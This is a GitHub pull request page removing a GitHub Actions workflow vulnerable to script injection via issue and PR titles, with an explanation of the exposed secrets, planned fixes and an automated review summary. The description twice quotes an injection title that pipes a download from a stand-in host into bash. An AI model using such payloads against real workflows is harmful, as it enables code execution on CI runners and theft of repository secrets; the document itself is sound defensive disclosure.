security: remove vulnerable create_pylon_issue.yml workflow#2207
security: remove vulnerable create_pylon_issue.yml workflow#2207
Conversation
This workflow interpolates `${{ github.event.issue.title }}` and
`${{ github.event.pull_request.title }}` directly into `run:` shell
steps. The surrounding single quotes around the curl `--data` payload
do not protect against a quote-breakout in the title (e.g.
`foo'$(curl evil|bash)'bar`), giving any GitHub user code execution
on the runner with the workflow's GITHUB_TOKEN, PYLON_API_KEY,
PYLON_ACCOUNT_ID, and PYLON_REQUESTER_ID.
The trigger surface is broad: `issues: opened` lets any user trigger
it by opening an issue, and `pull_request_target: opened` runs in the
base-repo context with access to base secrets against fork-controlled
input.
Removing entirely for now; the auto-create-Pylon-ticket behavior can
be reintroduced later with env-var indirection for user-controlled
fields and an author_association gate.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
|
👋 @haritamar |
|
No actionable comments were generated in the recent review. 🎉 ℹ️ Recent review info⚙️ Run configurationConfiguration used: defaults Review profile: CHILL Plan: Pro Run ID: 📒 Files selected for processing (1)
💤 Files with no reviewable changes (1)
📝 WalkthroughWalkthroughA GitHub Actions workflow file that automated Pylon issue creation for GitHub issues and pull requests has been deleted. The workflow previously integrated with the Pylon API to generate tickets and embed ticket identifiers in issue/PR bodies. Changes
Estimated code review effort🎯 1 (Trivial) | ⏱️ ~2 minutes Poem
🚥 Pre-merge checks | ✅ 5✅ Passed checks (5 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches🧪 Generate unit tests (beta)
Comment |
1 participant
Summary
.github/workflows/create_pylon_issue.yml. Same script-injection class asupdate_pylon_issue.yml(removed in security: remove vulnerable update_pylon_issue.yml workflow #2206) — the issue/PR title is interpolated directly into arun:shell block.\"title\": \"\${{ github.event.issue.title }}\",(line 27)\"title\": \"\${{ github.event.pull_request.title }}\",(line 56)--data '{ ... }'does not protect: a title likefoo'\$(curl evil|bash)'barbreaks out of the single-quoted string and triggers command substitution on the runner.Why the trigger surface is worse than the comment one
issues: opened— any GitHub user can fire this just by opening an issue with a poisoned title. No PR, no fork required.pull_request_target: opened— runs in the base repo's context with full access to base secrets against fork-controlled input. Anyone can fork and open a PR with a poisoned title.Secrets at risk
GITHUB_TOKEN,PYLON_API_KEY,PYLON_ACCOUNT_ID,PYLON_REQUESTER_ID— all interpolated into the samerun:block alongside the title, so all reachable from the rendered script on disk.Why a full delete (not a patch)
Same reasoning as #2206: stop the bleeding now. The auto-create-Pylon-ticket behavior can be reintroduced later with:
env: ISSUE_TITLE: \${{ github.event.issue.title }}+\"\$ISSUE_TITLE\"in the script body, ideally passed to the JSON payload viajqrather than string interpolation), andauthor_associationgate so untrusted forks/issuers can't trigger sensitive paths.Audit context
close_pylon_issue.ymlwas reviewed and is not vulnerable — it only interpolates typed/internal values (event_name,repository, issue/PRnumber); user content is captured into a shell variable and only matched against a UUID regex..github/workflows/for\${{ github.event.*.{body,title,...} }}inrun:blocks turned up no other hits.Test plan
Summary by CodeRabbit